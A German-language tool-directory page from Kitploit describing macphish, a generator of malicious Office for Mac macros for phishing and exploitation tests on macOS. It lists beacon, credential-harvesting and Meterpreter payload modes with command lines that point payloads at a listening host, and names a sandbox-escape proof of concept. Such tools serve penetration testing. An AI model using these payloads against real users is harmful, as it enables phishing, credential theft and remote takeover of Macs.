Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
macphish — Erzeugt bösartige Office für Mac Makros mit Beacon-, Credential-Harvesting- und Meterpreter-Payloads für Phishing- und Exploitation-Tests auf macOS. | Kitploit
Tools/GitHubGitHub/cldrn/macphish
Payload-GenerierungExploitationPhishing
GitHubcldrn/macphish

macphish

Erzeugt bösartige Office für Mac Makros mit Beacon-, Credential-Harvesting- und Meterpreter-Payloads für Phishing- und Exploitation-Tests auf macOS.

Repository anzeigen
2455094vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

macphish

Office für Mac Makro-Payload-Generator macphish

Angriffsvektoren

Es stehen 4 Angriffsvektoren zur Verfügung:

  • beacon
  • creds
  • meterpreter
  • meterpreter-grant

Für die 'creds'-Methode kann macphish das Applescript-Skript direkt generieren, falls Sie es von einer Shell aus ausführen müssen.

beacon

Bei der Ausführung signalisiert dieser Payload unserem Lausch-Host und liefert grundlegende Systeminformationen über das Opfer. Die einfachste Methode zum Generieren eines Beacon-Payloads ist:

$./macphish.py -lh <lausch-host> 

Standardmäßig wird curl verwendet, aber andere Dienstprogramme (wget, nslookup) können durch Ändern der Befehlsvorlage genutzt werden.

creds

$./macphish.py -lh <lausch-host> -lp <lausch-port> -a creds

meterpreter

Die einfachste Methode zum Generieren eines Meterpreter-Payloads ist:

$./macphish.py -lh <lausch-host> -lp <lausch-port> -p <payload> -a meterpreter 

meterpreter-grant

Um einen Meterpreter-Payload zu generieren, der zuerst GrantAccessToMultipleFiles() aufruft:

$./macphish.py -lh <lausch-host> -lp <lausch-port> -p <payload> -a meterpreter-grant

Für Meterpreter-Angriffe werden derzeit nur Python-Payloads unterstützt.

Verwendung

Siehe https://github.com/cldrn/macphish/wiki/Usage

PoCs

  • Sandbox-Umgehung mittels GrantAccessToMultipleFiles in Word für Mac
  • PoC von Global And Recursive Permissions – Schädliche Makros für Word in macOS
  • Meterpreter-Ausführung in Office für Mac mit Makros
  • Credential-Harvesting (Phishing) mit Word-Makros in macOS
Tool herunterladen